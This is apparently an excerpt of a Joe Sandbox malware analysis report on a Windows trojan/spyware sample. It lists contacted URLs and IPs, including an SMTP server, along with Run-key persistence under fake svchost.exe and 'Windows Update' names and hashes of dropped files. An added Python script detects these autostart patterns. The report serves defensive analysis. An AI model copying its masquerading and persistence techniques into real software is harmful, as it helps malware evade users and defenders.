                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cntaskhost.exe, 00000005.00000003.231928279.0000000005770000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sakkal.comiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/phy/taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/Vershtaskhost.exe, 00000005.00000003.232528224.000000000574B000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.carterandcone.com_taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          http://www.carterandcone.comlttaskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Gtaskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://whatismyipaddress.comtaskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cnziExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.fontbureau.comWiExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cn/TiExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/ztaskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.founder.com.cn/cn/Ptaskhost.exe, 00000005.00000003.231021953.000000000576E000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.carterandcone.comltaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
URL | Source | Malicious | Antivirus Detection | Reputation
http://www.jiyu-kobo.co.jp/; | taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/z | taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn1 | taskhost.exe, 00000005.00000003.231408705.0000000005770000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/16 | taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | taskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.comlvfet | iExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.comO | taskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmp | false | - | high
https://www.google.com/accounts/servicelogin | taskhost.exe, iExplorer.exe, Windows Update.exe | false | - | high
http://www.founder.com.cn/cntL | taskhost.exe, 00000005.00000003.231545876.0000000005751000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/c | taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.comic | taskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Vet | taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                                                    Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.16.154.36 | whatismyipaddress.com | United States | 13335 | CLOUDFLARENETUS | false
94.100.180.160 | smtp.mail.ru | Russian Federation | 47764 | MAILRU-ASMailRuRU | false

Private

IP
192.168.2.1
127.0.0.1

                                                                    General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 478309
Start date: 06.09.2021
Start time: 11:21:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 20s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: aaVb1xEmrd (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@45/38@8/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 11.7% (good quality ratio 9.7%)
• Quality average: 62.4%
• Quality standard deviation: 36.1%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 424
• Number of non-executed functions: 90
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe
                                                                    • Excluded IPs from analysis (whitelisted): 184.30.21.144, 20.42.65.92, 23.211.4.86, 20.189.173.22, 20.50.102.62, 20.189.173.20, 23.55.161.162, 23.55.161.142, 184.24.8.125, 20.199.120.182, 184.24.3.140, 20.82.209.104, 52.182.143.212, 23.216.77.208, 23.216.77.209, 40.112.88.60, 20.82.210.154
                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, cdn.onenote.net.edgekey.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, onedsblobprdcus15.centralus.cloudapp.azure.com, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, client.wns.windows.com, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, tile-service.weather.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net
• Not all processes were analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

Time | Type | Description
11:22:24 | API Interceptor | 926x Sleep call for process: svchost.exe modified
11:22:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
11:22:27 | API Interceptor | 5x Sleep call for process: taskhost.exe modified
11:22:35 | API Interceptor | 23x Sleep call for process: Windows Update.exe modified
11:22:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
11:22:39 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
11:22:39 | API Interceptor | 4x Sleep call for process: dw20.exe modified
11:22:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
11:22:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
11:23:01 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
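The Run-key entries in the table above are what the report's signatures "Creates multiple autostart registry keys", "Drops PE files with benign system names" and "System File Execution Location Anomaly" refer to. The following Python script is an added triage example, not part of the Joe Sandbox report and not Joe Sandbox code. It parses autostart lines in the raw form Joe Sandbox emits them (`<time>AutostartRun: <hive\key> <value name> <target path>`) and flags four patterns visible in this sample: a system binary name (svchost.exe) launched from outside System32/SysWOW64, a target under a user profile directory, a value name imitating "Windows Update", and the same target registered under both HKCU and HKLM. The six sample lines are copied from the report; the seventh (SecurityHealth) is a constructed benign entry so the rules have a non-match, and the rule tables (SYSTEM_BINARY_NAMES, IMPERSONATED_NAMES, SYSTEM_DIRS) are assumptions chosen for the example.

```python
"""Triage of Joe Sandbox 'AutostartRun' lines (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: the six AutostartRun lines from the report's
# "Behavior and APIs" table, plus one assumed-benign entry (last line)
# that is NOT from the report, included so the rules have a non-match.
SAMPLE_LINES = [
    r"11:22:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe",
    r"11:22:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe",
    r"11:22:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe",
    r"11:22:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe",
    r"11:23:01AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe",
    r"11:25:00AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SecurityHealth C:\Windows\System32\SecurityHealthSystray.exe",  # assumed benign
]

# Joe Sandbox prints "<time>AutostartRun: <hive\key> <value name> <target path>";
# the value name may contain spaces, so the path is anchored on "X:\".
AUTOSTART_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2})AutostartRun: "
    r"(?P<key>\S+) (?P<name>.+?) (?P<path>[A-Za-z]:\\.*)$"
)

# Rule tables (assumptions chosen for this example, not taken from the report).
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SYSTEM_BINARY_NAMES = {"svchost.exe", "taskhost.exe", "lsass.exe", "csrss.exe",
                       "winlogon.exe", "services.exe", "explorer.exe"}
IMPERSONATED_NAMES = ("windows update", "windows defender", "microsoft")


@dataclass
class AutostartEntry:
    time: str
    hive: str      # HKCU/HKLM with the 64-bit-view suffix stripped
    key: str
    name: str
    path: str


@dataclass
class Finding:
    entry: AutostartEntry
    reasons: list = field(default_factory=list)


def parse_autostart(line):
    """Return an AutostartEntry for one report line, or None if it is not one."""
    m = AUTOSTART_RE.match(line.strip())
    if not m:
        return None
    key = m.group("key")
    hive = key.split("\\", 1)[0]
    if hive.endswith("64"):           # HKCU64 / HKLM64 are the same hive, 64-bit view
        hive = hive[:-2]
    return AutostartEntry(m.group("time"), hive, key, m.group("name"), m.group("path"))


def triage(lines):
    """Apply the four rules to every parsed entry; return only entries with hits."""
    entries = [e for e in map(parse_autostart, lines) if e is not None]

    # Cross-entry rule: which hives point at each target path?
    hives_by_target = defaultdict(set)
    for e in entries:
        hives_by_target[e.path.lower()].add(e.hive)

    findings = []
    for e in entries:
        p = e.path.lower()
        directory, _, base = p.rpartition("\\")
        reasons = []
        if base in SYSTEM_BINARY_NAMES and directory not in SYSTEM_DIRS:
            reasons.append(f"system binary name {base} outside System32/SysWOW64")
        if "\\appdata\\" in p or p.startswith("c:\\users\\"):
            reasons.append("target lives in a user-writable profile directory")
        if any(s in e.name.lower() for s in IMPERSONATED_NAMES):
            reasons.append(f"value name '{e.name}' imitates a Windows component")
        if len(hives_by_target[p]) > 1:
            reasons.append("same target registered under "
                           + ", ".join(sorted(hives_by_target[p])))
        if reasons:
            findings.append(Finding(e, reasons))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f.entry.time} {f.entry.key} [{f.entry.name}] -> {f.entry.path}")
        for r in f.reasons:
            print("    -", r)
```

Run as-is it reports five of the seven entries: the three svchost.exe registrations hit all of the first, second and fourth rules (HKCU and HKLM both point at the AppData copy), the two "Windows Update" registrations hit the profile-directory and impersonation rules, and the constructed SecurityHealth entry is silent. The same rules apply unchanged to `Get-ItemProperty` output from a live host once the lines are put in the same shape.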

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASN

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 0.5975851327512959
Encrypted: false
SSDEEP: 6:0FLk1GaD0JOCEfMuaaD0JOCEfMKQmD6tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0aGaD0JcaaD0JwQQ6tAg/0bjSQJ
MD5: D87796F366C70FF245EE50AC6D986702
SHA1: 18EF75524480ACB54EDD94C6649B4A98EBC38AB9
SHA-256: D96C38CD97B679DA05AC6BFE6CA5E971802C213407780EA4E190668A9960D3AA
SHA-512: 107D0C23110F90BADB501CCD644971AD99185BE223FBDBFEE76B103D9256740A5D9463E68996847B74267F6379DEBFCB752E8BA94AD3C174FEA888BBD881EFED
Malicious: false
Reputation: unknown
                                                                    Preview: ......:{..(.....!....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................!....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xebd9be4e, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.09588615580835741
Encrypted: false
SSDEEP: 12:X+sA0+NXO4blD2KlK5+sA0+NXO4blD2KlK:X+I3+I
MD5: 8D9FC6C34120DDC9EEA7B8B108D1E52E
SHA1: 62C0CDA550C8DBA877555389B59D43AB4F35EDEE
SHA-256: D85849AD410CAF5DB73EE255A463C72BA4058EB3E96AB3FC20684176BE614C98
SHA-512: 0730F6677CDADEE365B524197E69961DD31B27521D3822F0B1B4D87C224D3C1DFA93AA800B3077C55A7543628628734E5E6DF46910C8C1E9262AAE9885C18616
Malicious: false
Reputation: unknown
                                                                    Preview: ..N... ................e.f.3...w........................&..........w..!....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................X5."....y.a................Qm.a"....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.10820739268990756
Encrypted: false
SSDEEP: 3:jZ/ll9EvHH5t7l/bJdAti/UTel/all:l/An5t7t4VmG
MD5: 5E6F02764C632E3A889D8DB681D43DFC
SHA1: A739505085968FC5B82E0B4E66ED2A10DABF7B4A
SHA-256: 89304DD33D2A96013D8B95D81A323D61CA7CFEEF26C9132564B301C41B944F02
SHA-512: 24BFAA1AB9B0BC1EF44DC3317671B2A873533927DD31DE7435AC0F12B1A150383FF3435CDF57C092836B491BA27D21C716289E05851F38886519387670F60119
Malicious: false
Reputation: unknown
                                                                    Preview: w5|......................................3...w.."....y.......w...............w.......w....:O.....w..................Qm.a"....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_vbc.exe_29b1fd91934ca85fd856bebf7e23b59544bb3f14_6c16ead4_19baeb35\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 7832
Entropy (8bit): 3.7697654129894604
Encrypted: false
SSDEEP: 192:IgpBKDT5HBUZMXQf9jY/u7s7S274ItE7GDBv:I6YD9BUZMXojY/u7s7X4ItEOp
MD5: 94A7FB9849AACBCB38DA210BD4A9A0E5
SHA1: 50DA047C42570B6CABECDCE1291C32ACF39AD5C7
SHA-256: 75DC3BF23E7EFC0C872E26F403688A070C8FDA1465257DDC3BAA47F2FF3F56DF
SHA-512: 5F0D884E4B56C2C0295A53F32AE53054AA20212DB8614ACC7E0D9A61EC95A8B8F74B3A8A96ED1486AEEFD255C948D23CEB70154C18A1AD63F87DA8D381AAECA2
Malicious: false
Reputation: unknown
                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.6.1.8.6.4.5.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.8.0.9.2.6.7.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.c.4.e.c.f.7.-.a.a.f.7.-.4.8.6.7.-.9.2.4.8.-.f.5.b.8.3.3.4.1.3.5.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.8.8.6.4.d.1.-.b.4.7.9.-.4.8.2.b.-.9.4.0.b.-.b.f.b.b.4.d.9.e.1.8.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.b.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.b.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.9.4.-.0.0.0.1.-.0.0.1.7.-.0.0.4.c.-.9.9.2.7.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.8.7.d.9.a.6.e.c.3.f.2.6.2.e.8.b.7.1.d.1.9.a.c.1.5.7.c.2.a.2.8.6.a.0.f.5.9.d.d.!.v.b.c.
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_vbc.exe_dbc95366787c6af920cbf43ce460525ddeedebbd_966227d3_198ee9cd\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 7830
Entropy (8bit): 3.7688031144285605
Encrypted: false
SSDEEP: 192://XKUi28THBUZMXQf9jY/u7s7S274ItE7GDS:H6Ui2wBUZMXojY/u7s7X4ItEOS
MD5: ABD2E2BFE051EC215B8B17037FE6FB2E
SHA1: DCE114947B4707712A8C0BE4617F063DFA619984
SHA-256: 19BBEA37874789645FDA94F57A01209A8D93E4B594ED9889256BE5E7E8C7AC6D
SHA-512: 3D3A092B00D4C85037F37AB5D94D372BB5D5EB6AA0EC2B7FADD31A25FBABD0F99B9ED7D5A152E27CB4D45225E28FB9E6CD206070F4A8984651E123A782656D7E
Malicious: false
Reputation: unknown
                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.6.0.7.7.0.8.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.7.9.8.3.3.3.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.c.4.f.c.7.5.-.f.a.b.6.-.4.5.4.a.-.a.c.5.f.-.f.1.3.9.9.e.b.1.9.0.b.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.9.6.1.7.b.3.-.1.4.2.7.-.4.8.8.f.-.8.0.1.4.-.d.d.7.9.b.6.b.5.c.3.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.b.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.b.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.8.8.-.0.0.0.1.-.0.0.1.7.-.e.f.9.d.-.8.2.2.7.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.8.7.d.9.a.6.e.c.3.f.2.6.2.e.8.b.7.1.d.1.9.a.c.1.5.7.c.2.a.2.8.6.a.0.f.5.9.d.d.!.v.b.c.
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_windows update.e_c1d66a88935183ae141aa58ee4c87ad14e6f9fe7_00000000_1a1eea0c\Report.wer
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 17916
Entropy (8bit): 3.7508704111475843
Encrypted: false
SSDEEP: 192:i9TMCyXaKsn9fbeN9M2v1zzvSXk0ZKjBIcQrlu/u7s7S274It0:8TM/aEdvh/slu/u7s7X4It0
MD5: CA90459EF7765BC961354186FB661F50
SHA1: A0EBC223F958677A5A2CB3A35C1C9BA3302B0B92
SHA-256: 66E4F2577080DA4AC723F71E68B967CCC503C1C013F873A7B0C830FC4017DBA8
SHA-512: B3E9D7782171052CE98EF178F3475BC54B2DCBAE79F1A6A3B7C0612100CF09E844A240DAABCDE894D1D469536809BD8123438AD566C0A49FC74C04F0EEDCAC8A
Malicious: false
Reputation: unknown
                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.6.7.8.9.7.1.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.7.8.5.2.2.1.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.7.c.3.e.7.d.-.c.2.7.1.-.4.6.e.e.-.a.b.e.7.-.f.9.7.2.6.9.f.9.0.4.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.4.-.0.0.0.1.-.0.0.1.7.-.9.4.1.7.-.3.e.2.5.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.c.2.2.0.b.8.c.0.1.0.a.8.d.3.0.b.9.9.7.3.7.8.f.6.6.e.3.c.7.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.1.9.a.b.2.f.0.6.2.a.e.b.9.8.5.d.b.1.f.1.1.d.4.4.e.e.6.c.0.1.7.7.f.7.e.5.9.a.9.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.8././.2.8.:.1.2.:.5.8.:.4.1.!.0.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....B.o.o.t.I.
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_439f3432e91833156ec2cf888feef2fd243e3be_00000000_185f3e17\Report.wer
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):16728
                                                                    Entropy (8bit):3.753206684513917
                                                                    Encrypted:false
                                                                    SSDEEP:192:3D6ErrfiQVfaKsn9fbeN9M2v1zzvSXk0ZKjBIcQG0/u7s7S274ItQ:nPiAaEdvh/B0/u7s7X4ItQ
                                                                    MD5:DDA4C55E65434CADEE12AB3E4C51BFB4
                                                                    SHA1:9F9FEC6F59EC16901E2863C64C0B283D62CEFAB1
                                                                    SHA-256:E7D4783787113E857F93C39A03B5B55AEA60C0815E1FF119E6B003003FFAC1E4
                                                                    SHA-512:E91C124B52411EFA64FE2A0C193469E7A5BC52237735C166DDE391E8B0E5290EF142E7BA7CC3DA41D84F1103179A0E0FC05E94FF6788F96DB321BB0E7CAEB6DB
                                                                    Malicious:true
                                                                    Reputation:unknown
